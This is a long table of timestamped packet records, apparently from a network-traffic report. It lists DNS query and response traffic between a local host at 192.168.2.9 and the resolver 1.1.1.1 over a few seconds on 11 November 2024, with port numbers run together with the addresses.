                                                                                                                                                                                                            Nov 11, 2024 18:08:09.392317057 CET6434353192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:09.392760038 CET6134453192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:09.392889977 CET5417353192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:09.393330097 CET5297853192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:09.393544912 CET5381853192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:09.394203901 CET5227753192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:10.864610910 CET6522753192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:10.864856958 CET6247653192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:10.864932060 CET5198453192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:10.865161896 CET6167053192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:10.866369009 CET53491931.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:10.867657900 CET53530441.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:10.872067928 CET53600981.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:10.872081041 CET53609411.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:10.872252941 CET53588331.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:10.872739077 CET53633451.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:10.873399973 CET53651671.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:10.873764992 CET53576761.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:10.874001980 CET5930853192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:10.874095917 CET53493251.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:10.874217987 CET6320553192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:10.874335051 CET5011853192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:10.874655962 CET53519841.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:10.874681950 CET53507671.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:10.874922991 CET53624761.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:10.875137091 CET53570671.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:10.876650095 CET53577781.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:10.876662970 CET53610281.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:10.877718925 CET53549431.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:10.883662939 CET53620841.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:10.885473967 CET53632051.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:10.886271954 CET53501181.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:10.888115883 CET53605381.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:10.888461113 CET53603601.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:10.893121958 CET53554621.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:10.895571947 CET53516641.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:10.895600080 CET53652271.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:10.895802975 CET53521451.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:10.897268057 CET53616701.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:10.906456947 CET53593081.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:11.315216064 CET5358753192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:11.317130089 CET5059053192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:11.322829008 CET5651953192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:11.324970961 CET5942453192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:11.326364994 CET6327953192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:11.326430082 CET53535871.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:11.327356100 CET6309453192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:11.327914953 CET6420753192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:11.328068972 CET4958653192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:11.328545094 CET5255153192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:11.329130888 CET6179853192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:11.329653978 CET4930553192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:11.330319881 CET5738653192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:11.332962990 CET53565191.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:11.333609104 CET5916253192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:11.334167004 CET5915753192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:11.335201025 CET53594241.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:11.336066008 CET53505901.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:11.336173058 CET5277453192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:11.336283922 CET6183453192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:11.336788893 CET53632791.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:11.338627100 CET53495861.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:11.339829922 CET53493051.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:11.340465069 CET53525511.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:11.341543913 CET6346053192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:11.342005968 CET5251453192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:11.344436884 CET53591621.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:11.347012043 CET53618341.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:11.347028017 CET53527741.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:11.352094889 CET53634601.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:11.352106094 CET53591571.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:11.358912945 CET53630941.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:11.359361887 CET53642071.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:11.360208988 CET53617981.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:11.360636950 CET53525141.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:11.361254930 CET5741753192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:11.362248898 CET53573861.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:11.365983963 CET6260053192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:11.368566990 CET5645353192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:11.369378090 CET5915553192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:11.372051001 CET5158453192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:11.372561932 CET5564253192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:11.374470949 CET5899553192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:11.374743938 CET6236053192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:11.375715971 CET5991853192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:11.376065016 CET4952353192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:11.377283096 CET5048353192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:11.377962112 CET53626001.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:11.378137112 CET53564531.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:11.378428936 CET5002553192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:11.379473925 CET53591551.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:11.382200956 CET53515841.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:11.387567997 CET53623601.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:11.387588024 CET53495231.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:11.388356924 CET53599181.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:11.389400959 CET53500251.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:11.392755985 CET53574171.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:11.395040035 CET6160453192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:11.395207882 CET6066053192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:11.400800943 CET5021753192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:11.401289940 CET6319153192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:11.401516914 CET6218853192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:11.401755095 CET5636853192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:11.402627945 CET53606601.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:11.403953075 CET53556421.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:11.404999971 CET53616041.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:11.405776978 CET53589951.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:11.405853987 CET5390053192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:11.406271935 CET5748553192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:11.407732010 CET5227853192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:11.408128023 CET5612253192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:13.246947050 CET53642781.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:13.248207092 CET53529881.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:13.252043962 CET53604691.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:13.252199888 CET53572741.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:13.252211094 CET53515001.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:13.256613970 CET53633141.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:13.259412050 CET53510221.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:13.261362076 CET53641531.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:13.265650034 CET53547901.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:13.274094105 CET5083753192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:13.275345087 CET5934453192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:13.276880980 CET53576791.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:13.283925056 CET5799453192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:13.284933090 CET53593441.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:13.285202980 CET53508371.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:13.313404083 CET5383553192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:13.315088987 CET53579941.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:13.317915916 CET5223153192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:13.318373919 CET6418553192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:13.321690083 CET5373653192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:13.321881056 CET6205653192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:13.325093031 CET53538351.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:13.327799082 CET53522311.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:13.327811003 CET53641851.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:13.345215082 CET5065153192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:13.345392942 CET5207353192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:13.345716953 CET5029653192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:13.345963001 CET6181453192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:13.346172094 CET6194853192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:13.346615076 CET6434253192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:13.346797943 CET6402353192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:13.347301960 CET5919953192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:13.347508907 CET5315353192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:13.347731113 CET5692953192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:13.353507996 CET53537361.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:13.353713036 CET53618141.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:13.353951931 CET53620561.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:13.356844902 CET53643421.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:13.356910944 CET53619481.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:13.356920958 CET53506511.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:13.357285023 CET5952353192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:13.357580900 CET5625653192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:13.357964039 CET53591991.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:13.357979059 CET53520731.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:13.359286070 CET53569291.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:13.359607935 CET53640231.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:13.359637022 CET53531531.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:13.359985113 CET5164253192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:13.360207081 CET6363753192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:13.360632896 CET4975553192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:13.360909939 CET6548053192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:13.363167048 CET5595853192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:13.370054960 CET53595231.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:13.371752977 CET53497551.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:13.371766090 CET53654801.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:13.375092030 CET53559581.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:13.377670050 CET5447053192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:13.387603998 CET4960153192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:13.387782097 CET5484253192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:13.388164043 CET53544701.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:13.388623953 CET6474053192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:13.389688969 CET5719653192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:13.390153885 CET53562561.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:13.391403913 CET53516421.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:13.392366886 CET53502961.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:13.393843889 CET53636371.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:13.397217035 CET5164553192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:13.398741961 CET53548421.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:13.399986982 CET53571961.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:13.418523073 CET53496011.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:13.420804024 CET53647401.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:13.427606106 CET53516451.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:15.915714979 CET5165653192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:15.916286945 CET6045753192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:15.917709112 CET6061553192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:15.926132917 CET53516561.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:15.926800966 CET53606151.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:15.928801060 CET5179353192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:15.938024998 CET5483553192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:15.942213058 CET53517931.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:15.947844028 CET53604571.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:15.948509932 CET53548351.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:15.955102921 CET6089753192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:15.957029104 CET5178853192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:15.962547064 CET53608971.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:15.967497110 CET53517881.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:15.968125105 CET5996853192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:15.971446991 CET6500153192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:15.971935034 CET5519553192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:15.974092007 CET5054053192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:15.974850893 CET6400053192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:15.979423046 CET6532853192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:15.979643106 CET53599681.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:15.981245995 CET6129453192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:15.982367992 CET5034553192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:15.982649088 CET53551951.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:15.983110905 CET5640353192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:15.983925104 CET53505401.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:15.984621048 CET53640001.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:15.985913992 CET5534553192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:15.987380028 CET4939053192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:15.989178896 CET5253553192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:15.989775896 CET53653281.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:15.999382973 CET53525351.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:16.003540993 CET53650011.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:17.593882084 CET5536753192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:17.594113111 CET6280953192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:17.594513893 CET5497053192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:17.594747066 CET5581453192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:17.594928980 CET5943553192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:17.598212004 CET6411253192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:17.600555897 CET5319453192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:17.601407051 CET5473553192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:17.602622986 CET53514191.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:17.602698088 CET6504853192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:17.603707075 CET53628091.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:17.604098082 CET53558141.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:17.604845047 CET53594351.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:17.605812073 CET53549701.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:17.607561111 CET4994153192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:17.607834101 CET6262653192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:17.609205961 CET5063753192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:17.611145020 CET53547351.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:17.611156940 CET53531941.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:17.612838984 CET53650481.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:17.616600990 CET5604353192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:17.616636038 CET53499411.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:17.616774082 CET5038253192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:17.617392063 CET53626261.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:17.620771885 CET53506371.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:17.626538038 CET53553671.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:17.627612114 CET5084353192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:17.627851963 CET5543453192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:17.637765884 CET53554341.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:17.637815952 CET53508431.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:17.639084101 CET5877453192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:17.643153906 CET5575253192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:17.647739887 CET53503821.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:17.648655891 CET53552321.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:17.656079054 CET53557521.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:17.656800032 CET53587741.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:17.702573061 CET6126253192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:17.705095053 CET5874153192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:17.717345953 CET6224253192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:17.718271017 CET53587411.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:17.726869106 CET53622421.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:17.733721972 CET6358353192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:17.735857964 CET53612621.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:17.744525909 CET53635831.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:17.821907043 CET53641121.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:17.864485025 CET53560431.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:18.095849037 CET5438053192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:18.107959032 CET53543801.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:18.241224051 CET5463953192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:18.247834921 CET5222453192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:18.251569033 CET53546391.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:18.255080938 CET6494053192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:18.278603077 CET53522241.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:18.285778999 CET53649401.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:18.296621084 CET5995453192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:18.312520981 CET5852153192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:18.314307928 CET6188553192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:18.322024107 CET53585211.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:18.324404001 CET53618851.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:18.328919888 CET53599541.1.1.1192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:18.585989952 CET5484653192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:18.586405993 CET5583253192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:18.586735964 CET5396353192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:18.587270021 CET4927653192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:18.587696075 CET5713253192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:18.588246107 CET6412053192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:18.588615894 CET5956653192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:18.589270115 CET6393353192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:18.589689016 CET5106553192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:18.590451956 CET5795153192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:18.591206074 CET6268253192.168.2.91.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:08:18.591520071 CET6369153192.168.2.91.1.1.1
